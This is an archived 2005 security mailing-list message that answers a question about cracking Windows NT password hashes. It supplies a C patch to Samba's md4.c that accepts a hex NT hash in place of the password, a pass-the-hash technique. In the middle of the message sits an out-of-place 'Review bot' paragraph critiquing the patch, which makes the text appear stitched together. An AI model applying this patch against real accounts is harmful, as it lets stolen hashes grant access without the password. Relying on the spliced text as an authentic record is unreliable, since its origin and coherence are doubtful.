Open Source and information security mailing list archives
 
Message-ID: <1683372804.20050730132451@SECURITY.NNOV.RU>
Date: Sat Jul 30 10:24:57 2005
From: 3APA3A at SECURITY.NNOV.RU (3APA3A)
Subject: Best way to crack NT passwds

Dear X u r r o n,

You needn't actually crack the password if you know your hash, because
the cleartext password is never used in a Windows environment. You could
apply this patch to md4.c from the Samba distribution:

--- md4.c.orig  2004-04-04 11:37:00.000000000 +0400
  +++ md4.c       2004-10-27 23:01:31.000000000 +0400
  @@ -130,6 +130,21 @@
          C = 0x98badcfe;
          D = 0x10325476;
  +
  +       if(n == 64){
  +        int j;
  +        unsigned char * hexd = (unsigned char *)"0123456789ABCDEF";
  +        for(j = 0; j<16; j++){
  +         if(!strchr(hexd, in[(j<<2)]))break;
  +         if(in[(j<<2)+1])break;
  +         if(!strchr(hexd, in[(j<<2)+2]))break;
  +         if(in[(j<<2)+3])break;
  +         out[j] = ((strchr(hexd, in[(j<<2)]) - (char *)hexd)<<4);
  +         out[j] ^= (strchr(hexd, in[(j<<2)+2]) - (char *)hexd);
  +        }
  +        if(j == 16) return;
  +       }
  +
          while (n > 64) {
                  copy64(M, in);
                  mdfour64(M);
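
Review bot: The hex check at `if(!strchr(hexd, in[(j<<2)]))break;` also accepts a zero byte, because strchr() matches the string's terminating NUL; that byte then yields index 16, which is not a valid nibble, and it is still folded into `out[j]`. Test the byte for non-zero before the lookup, or use an explicit range check on '0'-'9' and 'A'-'F', and compute each index once instead of calling strchr() twice per digit. The table is uppercase only, so a hash entered in lowercase falls through to normal hashing, while any genuine 32-character password made of uppercase hex digits is no longer hashed at all; both behaviours deserve a comment above the block. `out` is also written before all 16 pairs have been validated, so validating first and decoding second would be cleaner, and `hexd` is declared `unsigned char *` only to be passed to strchr() and cast back to `char *`, which a plain `const char *` would avoid.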

And change your password with Samba utilities by entering the NT password
hash (in HEX) instead of the password when prompted.

--Saturday, July 30, 2005, 12:15:47 PM, you wrote to full-disclosure@...ts.grok.org.uk:

Xurron> hiya!
Xurron> I have tried many softwares for cracking NTLM hashes, like NC4,
Xurron> Cain and haven't tried Rainbow Crack yet.
Xurron> Once I had to recover my XP's lost admin password and I spent
Xurron> around 1 day but Cain/NC4 were not able to guess that. Then I posted
Xurron> those hashes on some site and it did recover my passwd in around 5min. I
Xurron> want to know which technique they used to crack so fast?

Xurron> Xurron


-- 
~/ZARAZA
http://www.security.nnov.ru/
